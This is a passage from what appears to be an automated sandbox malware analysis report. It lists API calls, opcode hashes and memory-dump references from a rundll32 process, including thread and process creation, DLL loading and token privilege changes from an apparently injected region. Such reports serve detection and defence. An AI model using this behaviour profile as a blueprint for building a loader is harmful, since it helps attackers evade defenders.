                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0079836A
                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0079838B
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID:
                                • API String ID: 1836367815-0
                                • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                • Instruction ID: 872391ecd9e47a66e5aceded93f891a03df9c9c53924f59689d24eb710828263
                                • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                • Instruction Fuzzy Hash: E901A731A81228B7EB21A6949C47FFE776C6B41F50F040214FF04BA1C2E6D8690546F6
                                APIs
                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0079AD52
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                • Instruction ID: c4a7d0aee2d8bfa818ce3ff55ca8f645dbdfd38d62ab0af3d06207add10b657a
                                • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                • Instruction Fuzzy Hash: 70014CB5E4020DBBDF10EAE4EC46F9EB7789B54308F0042A4A90997641F634EA04CB92
                                APIs
                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007AA724
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID:
                                • API String ID: 2186235152-0
                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                • Instruction ID: 730bfce39f5a29cacb8beedea82ff3b8cd74805771e93e21cda01b854f229930
                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                • Instruction Fuzzy Hash: F601B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                APIs
                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007AA724
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID:
                                • API String ID: 2186235152-0
                                • Opcode ID: 72ff0993656aa47b16fe25092ef5bcb3a7899c1fb6d6468eb2010bf54de32f6b
                                • Instruction ID: 8a44ca932ae9a6c21ca132686e16eca3e1187af8bf19dcefe029fb23464aff30
                                • Opcode Fuzzy Hash: 72ff0993656aa47b16fe25092ef5bcb3a7899c1fb6d6468eb2010bf54de32f6b
                                • Instruction Fuzzy Hash: 1201A4B2200108BFCB54DF89DD80EEB77AEAF8C354F158248BA1DD7251C630E951CBA0
                                APIs
                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0079F040,?,?,00000000), ref: 007A91DC
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 0c5ca6d4c7e301a8f587fc596a1b38b8420365de227eb8d3e274ef6237d30cb9
                                • Instruction ID: f03164d4cd87050d0c93fcb74e3e440f5620a977b4fc0d20cfb7ddff2846fe20
                                • Opcode Fuzzy Hash: 0c5ca6d4c7e301a8f587fc596a1b38b8420365de227eb8d3e274ef6237d30cb9
                                • Instruction Fuzzy Hash: C3E06D333902047AE22065A9EC02FA7B39C9BC2B20F140126FB0DEB2C1D59AF80142A4
                                APIs
                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0079F040,?,?,00000000), ref: 007A91DC
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 4f6025de85842b789f25400ea47d317924f8f1961ab5a8d3bdb8e24435636f33
                                • Instruction ID: 6f106d31b3f07dc6ccd272f81c830e1f3b923b3407eb3b45e4f285e67583836a
                                • Opcode Fuzzy Hash: 4f6025de85842b789f25400ea47d317924f8f1961ab5a8d3bdb8e24435636f33
                                • Instruction Fuzzy Hash: B1E09277390204BAE2316698DC03FAB77A99BD2B10F150129F709EB2C1D5AAB90142A5
                                APIs
                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0079F1C2,0079F1C2,?,00000000,?,?), ref: 007AA7F0
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: LookupPrivilegeValue
                                • String ID:
                                • API String ID: 3899507212-0
                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                • Instruction ID: 479538a8da233ad1b8b6b097e1c16f2e799c56031715b9e14df79aefa9dcd862
                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                • Instruction Fuzzy Hash: C4E01AB1200208AFDB14DF49CC85EE737ADAF89650F018154BA0C57241CA34E9108BF5
                                APIs
                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0079F1C2,0079F1C2,?,00000000,?,?), ref: 007AA7F0
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: LookupPrivilegeValue
                                • String ID:
                                • API String ID: 3899507212-0
                                • Opcode ID: fb780fc6cee316e2d03e04fc2132e1abb928f6ef3c4b2debe0297613b0e2e9f7
                                • Instruction ID: 703e3eb99cade40cd7aea1f62c983cdccf975a87ef71ce45611e8ee94686c14f
                                • Opcode Fuzzy Hash: fb780fc6cee316e2d03e04fc2132e1abb928f6ef3c4b2debe0297613b0e2e9f7
                                • Instruction Fuzzy Hash: 63E0DFB5204250AFCB24DF54DC81EEB3BA8EF85220F048598FC8C1B203C534E804CBB4
                                APIs
                                • SetErrorMode.KERNELBASE(00008003,?,00798D14,?), ref: 0079F6EB
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_790000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode
                                • String ID:
                                • API String ID: 2340568224-0
                                • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                • Instruction ID: d46974c5b0bbafaaba78ac02bd34c8819828d9b2ab629bc032c74422672e1e4e
                                • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                • Instruction Fuzzy Hash: 4AD0A7727503043BEA10FAA49C07F2633CC6B85B00F490074F948D73C3D959F4004165
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                • Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 5f95bd89821471824d9afa840b8118212594b5efe182c2149d1c0c17a8dda3ec
                                • Instruction ID: af5cdee323d8401161546fffbd64736052392327eab3aac0742258f28af74b5d
                                • Opcode Fuzzy Hash: 5f95bd89821471824d9afa840b8118212594b5efe182c2149d1c0c17a8dda3ec
                                • Instruction Fuzzy Hash: F8B09B719015C5C5FB11F7604B0C71779586BD0705F15C0B1D2431651E4738D1D1E5F5
                                APIs
                                • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00A0414D
                                • NtSetInformationProcess.NTDLL(000000FF,00000022,?,00000004), ref: 00A04162
                                • AttachConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0(000000FF), ref: 00A04199
                                • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00A041B1
                                • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(WLDP.DLL,00000000,00000800,?,?,?), ref: 00A0420E
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,WldpIsAllowedEntryPoint), ref: 00A04220
                                • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00008001), ref: 00A0428A
                                • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00A04345
                                • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00A0434F
                                • DeactivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000000,00000000), ref: 00A04386
                                • ReleaseActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?), ref: 00A0438D
                                  • Part of subcall function 00A037C3: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00A037D4
                                  • Part of subcall function 00A037C3: CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00A019CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00A037F0
                                  • Part of subcall function 00A037C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00A03808
                                  • Part of subcall function 00A037C3: GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00A0381D
                                  • Part of subcall function 00A037C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00A03866
                                  • Part of subcall function 00A037C3: SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A03873
                                  • Part of subcall function 00A037C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00A0387A
                                  • Part of subcall function 00A037C3: CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00A08420,?), ref: 00A03897
                                  • Part of subcall function 00A037C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00A038D9
                                  • Part of subcall function 00A037C3: CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00A038E7
                                • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00A04398
                                • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00A043A1
                                • FreeConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0 ref: 00A043B0
                                • ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00A043B7
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: Free$EventLibraryLocal$CloseConsoleCreateHandleInformationInitializeProcess$AddressAllocAttachCurrentDeactivateErrorExitHandlesHeapLoadModeMultipleProcReleaseSecurityThreadUninitializeWait
                                • String ID: WLDP.DLL$WldpIsAllowedEntryPoint$localserver$requestedRunLevel
                                • API String ID: 3307762745-3890604504
                                • Opcode ID: f95332070de5160afc765765c260005b9afbd5d0499076377c60954ad9b7a314
                                • Instruction ID: ba4bb0edea5125fde9ec691e8331f0c51b60c855d03eab82db4230d3518e5147
                                • Opcode Fuzzy Hash: f95332070de5160afc765765c260005b9afbd5d0499076377c60954ad9b7a314
                                • Instruction Fuzzy Hash: 2B617EB1604309ABD710DF60ED45A6F77E9BFCC714F044A18BA95961E1CB34D90ACB52
                                APIs
                                • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00A05D8E
                                • RtlNtStatusToDosError.NTDLL ref: 00A05D95
                                • NtClose.NTDLL ref: 00A05DBE
                                • QueryActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(80000000,00000000,00000000,00000005,?,0000000C,00000000), ref: 00A05DED
                                • NtOpenProcessToken.NTDLL(000000FF,00000080,?), ref: 00A05E13
                                • NtSetInformationToken.NTDLL ref: 00A05E2F
                                • NtClose.NTDLL ref: 00A05E38
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: Token$CloseOpenProcess$ErrorInformationQueryStatus
                                • String ID:
                                • API String ID: 3674487995-0
                                • Opcode ID: 4597a324335065319c1df4192328d3f3f3f341f0f5ea412be815b22773f1f859
                                • Instruction ID: f716c7f0c0a5bdde85359db18db965ef44744917c4f696dcc6491f3d3b5f9cc9
                                • Opcode Fuzzy Hash: 4597a324335065319c1df4192328d3f3f3f341f0f5ea412be815b22773f1f859
                                • Instruction Fuzzy Hash: 63218232E0061DABDB20DBE4DD49BAF7B78EB48721F150215EA55B71E0DA309D05CBA0
                                APIs
                                • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00A03C87
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00A03C93
                                • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000104,00000000,?,00000000,00000008), ref: 00A03CF2
                                  • Part of subcall function 00A03B09: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00A03B39
                                  • Part of subcall function 00A03B09: IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00A03B40
                                  • Part of subcall function 00A03B09: GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00A03B6C
                                  • Part of subcall function 00A03B09: PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00A03B87
                                • RtlImageNtHeader.NTDLL(00000000), ref: 00A03D13
                                • SetProcessMitigationPolicy.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000000,?,00000008,?,00000000,00000008), ref: 00A03D4B
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: Process$AppendCurrentDirectoryErrorFormatHeaderImageLastLibraryLoadMessageMitigationPathPolicyProcess2SystemWow64
                                • String ID: `(u
                                • API String ID: 4162338769-2040362809
                                • Opcode ID: 57a62d7b6df4a915752e7099e9b4d7ce7402c00fe8132daa3ab240f739c423a0
                                • Instruction ID: 7544a223d0b42f4c72f5e8da750c59c4b3e07da95ac5b9c106f6cfb310364573
                                • Opcode Fuzzy Hash: 57a62d7b6df4a915752e7099e9b4d7ce7402c00fe8132daa3ab240f739c423a0
                                • Instruction Fuzzy Hash: 8B21A471A4121C6FFF10DB619C89FFB76BDEBC4700F108469B509D21D1DAB08F458A61
                                APIs
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00A04925
                                • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00A04936
                                • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00A0495D
                                • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00A04964
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorHeapLast$FreeProcess
                                • String ID: `(u
                                • API String ID: 1234203156-2040362809
                                • Opcode ID: 2eeefe9dd576031af25856f2cc34ed79470b895c8a0ef353358c42ba7b44cb67
                                • Instruction ID: 542d5158bb808db099a14872ab8f31b705199e886eddb9f4d6ddc8c4bc703966
                                • Opcode Fuzzy Hash: 2eeefe9dd576031af25856f2cc34ed79470b895c8a0ef353358c42ba7b44cb67
                                • Instruction Fuzzy Hash: B721A4B150011CDBCB11AFA0FD85A6FB769BF897457044164F6019B196DB309D06D7E1
                                APIs
                                • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00A06762
                                • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00A06771
                                • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00A0677A
                                • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00A06783
                                • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00A06798
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                • String ID:
                                • API String ID: 1445889803-0
                                • Opcode ID: 1242ba8a5b5cda7b53ae2e6b71d59162524fd433eb6a4a4ceb9dae278922d413
                                • Instruction ID: 45731ed3a7a51c1d210b5522f97344f20737ee16ef0067fe12a480966e4e5ebc
                                • Opcode Fuzzy Hash: 1242ba8a5b5cda7b53ae2e6b71d59162524fd433eb6a4a4ceb9dae278922d413
                                • Instruction Fuzzy Hash: BF112571E0020CABCF10DFF8EA4869EB7F5EF48314F5148A9D402E7260EB349B069B54
                                APIs
                                • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00A062F6,00A01000), ref: 00A061C7
                                • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00A062F6,?,00A062F6,00A01000), ref: 00A061D0
                                • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00A062F6,00A01000), ref: 00A061DB
                                • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00A062F6,00A01000), ref: 00A061E2
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                • String ID:
                                • API String ID: 3231755760-0
                                • Opcode ID: 4c44688dfe7514ae6faeff63a456b89c07bc1cdd1d7c6a109bd4392c7adb7c11
                                • Instruction ID: e979b88ae40d7ff90391d084f6745f7c7a13e0d7f5184c47f6e684731558b767
                                • Opcode Fuzzy Hash: 4c44688dfe7514ae6faeff63a456b89c07bc1cdd1d7c6a109bd4392c7adb7c11
                                • Instruction Fuzzy Hash: F0D0C93254010CBBDB40AFE1EC0DA0A3E28FB48312F044510F34A82022CB314403CB61
                                APIs
                                • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00000000), ref: 00A0265E
                                • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00A02737
                                • OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0(?), ref: 00A027A1
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                • String ID:
                                • API String ID: 4268342597-0
                                • Opcode ID: 27effea1d14805214f16b79aa68a0ae157970c11a39ffa9c218e5550b79bb23d
                                • Instruction ID: f9143550178b4de11db30cbeca850f1e4c5154e713633ecc642c14ce5eb29bd6
                                • Opcode Fuzzy Hash: 27effea1d14805214f16b79aa68a0ae157970c11a39ffa9c218e5550b79bb23d
                                • Instruction Fuzzy Hash: 88617B3560070D9FCB25DF68E84876ABBF6FF88710F15442AE84AD72A1DB35E802CB55
                                APIs
                                • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00A0161C,00000000,00000001,00A01940,?), ref: 00A02072
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID:
                                • API String ID: 542301482-0
                                • Opcode ID: d67e596ab0a9909b6cb8b217eb9a4bc3c7684a2ddf6c6016f0ff2442ca4a7d8d
                                • Instruction ID: 1b7ddac13e89a21d4d74d35b4ce8b6ddb7acf1841a0c54500d50fac99790ad5d
                                • Opcode Fuzzy Hash: d67e596ab0a9909b6cb8b217eb9a4bc3c7684a2ddf6c6016f0ff2442ca4a7d8d
                                • Instruction Fuzzy Hash: 95F0823574021CBFCB00DB94DC45FCE7769EB88750F140055FA06E72D1CAA1AE02CB90
                                APIs
                                • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000064C0), ref: 00A06515
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 7acd85268e18f5b8db26ce0d6aae975dd26663a47566f88301c54056bfea2dcf
                                • Instruction ID: 255f97592f4ab2cee18c3ce1b19c855e6a396860cf3191bcb4f190be3cdba773
                                • Opcode Fuzzy Hash: 7acd85268e18f5b8db26ce0d6aae975dd26663a47566f88301c54056bfea2dcf
                                • Instruction Fuzzy Hash: 1C90026065250896C6406FB07D4D50665A07A48B2F7420950A006C4195DA5241179511
                                APIs
                                • PathIsRelativeW.API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0(?,00000000,00000000,00000000), ref: 00A05932
                                • RtlSetSearchPathMode.NTDLL(00008001), ref: 00A05945
                                • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,00000104,?,?), ref: 00A05961
                                • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?), ref: 00A059BF
                                • CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00A059D1
                                • CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00A05A17
                                • CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00A05A38
                                • CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00A05A59
                                • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?), ref: 00A05A98
                                • CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?,?,?), ref: 00A05AB5
                                • ActivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?,00000000,?,?), ref: 00A05AF3
                                • memset.MSVCRT ref: 00A05BA7
                                • CompareStringW.API-MS-WIN-CORE-STRING-L1-1-0(0000007F,00000001,?,000000FF,IME,000000FF), ref: 00A05BD7
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                • Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd
                                Similarity
                                • API ID: Create$Path$Search$ActivateAttributesCompareFileHandleModeModuleRelativeStringmemset
                                • String ID: $ $.manifest$IME$N$|
                                • API String ID: 1902760705-3161873098
                                • Opcode ID: 03c1f7329cb48c9da68448bf9e6c7cc66fe45ce18937a887503320243b135cf5
                                • Instruction ID: a8efe1af0f45789319220795351caf9efe6ca3eeff5813b083dd3fb1f67f93b7
                                • Opcode Fuzzy Hash: 03c1f7329cb48c9da68448bf9e6c7cc66fe45ce18937a887503320243b135cf5
                                • Instruction Fuzzy Hash: 1A91A171A0061DAFDB20EFB4ED8CB9B77B8AB45321F1042A5F519E21D0E77499468F60
                                APIs
                                  • Part of subcall function 00A03A51: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00A03A7B
                                  • Part of subcall function 00A03A51: memset.MSVCRT ref: 00A03A8F
